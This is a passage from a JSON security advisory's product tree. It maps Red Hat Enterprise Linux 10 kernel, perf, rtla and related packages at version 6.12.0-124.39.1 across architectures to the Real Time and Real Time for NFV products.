"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.src as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.src",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
